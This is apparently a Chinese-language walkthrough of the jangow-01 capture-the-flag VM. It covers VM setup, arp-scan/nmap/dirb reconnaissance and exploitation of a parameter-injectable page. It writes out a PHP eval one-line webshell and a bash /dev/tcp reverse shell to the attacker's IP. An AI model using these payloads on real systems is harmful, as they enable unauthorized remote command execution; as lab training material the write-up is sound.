jangow-01-1.0.1靶机攻略

一.环境准备

1.1jangow靶机环境准备

1.1.1首先将我们解压好的的jangow-01-1.0.1.ova放入虚拟机里,并配置环境,安装好靶机后打开进行配置,按住shift,在界面按e进去得到图二。
1.1.2将ro 替换为 rw signie init=/bin/bash
1.1.3按住ctrl+x,ip a查看网卡信息,修改配置文件网卡信息
1.1.4编辑配置文件网卡信息, 英文键盘的斜杠按不出来,需要按数字键盘的斜杠,修改为如图所示内容后按shift+?然后输入wq点击回车退出,重启靶场

二.信息搜集

2.1ip搜集

2.1.1arp-scan -l 扫描靶机ip,发现靶机ip为192.168.182.138

2.2端口扫描

2.2.1使用nmap工具对目标机进行端口扫描,发现开启了80,21端口
2.2.2访问80,看有无有用信息,点击site
2.2.3依次点击,About,Projects,点击Buscar时,发现Buscar页面的url可以传参

2.3目录扫描

2.3.1使用kali的dirb进行目录扫描

三.漏洞利用

3.1输入一句话木马到1.php文件中,查看我们的1.php是否生效,访问http://192.168.182.138/site/1.php,发现生效

echo '<?php eval($_POST"cmd");' > 1.php

3.2复制绝对路径,去蚁剑连接

3,3在kali开启监听并触发反弹shell

在虚拟终端中输入

/bin/bash -c 'bash -i >& /dev/tcp/192.168.182.130/443 0>&1'

触发成功

jangow靶机练习到此结束

2025.7.27 17:20

相关推荐
小c君tt19 分钟前
linux学习笔记1
linux·笔记·学习
联盟分享专家1 小时前
垂直工具型 SaaS 的增长实战:如何把用户变成推广者?
运维
normanhere1 小时前
浪潮云国产化超融合规划和部署案例
服务器·网络
Leon-Ning Liu2 小时前
【真实经验分享】OGG抽取进程报错 ORA-07445 [kgherrordmp()+986] ORA-00600 [17114]分析步骤
运维·数据库
CCPC不拿奖不改名2 小时前
Redis 工程化部署深度解析
linux·服务器·数据库·redis·深度学习·缓存·rag
QWEDDRFTG2 小时前
运维长期经验总结:从故障倒推服务器电源线选购标准
运维·服务器
Mr.wangh2 小时前
聊天模型--流式传输
运维·服务器
有颜有货3 小时前
PMC生产排产的4种算法,一次讲清
java·服务器·前端
智恒百亿3 小时前
算力基建深度分析:国内服务器产业高强度迭代下的技术壁垒与全球化优势
服务器·人工智能·算力基建
fei_sun3 小时前
等价负载均衡(等价路由ECMP)
运维·负载均衡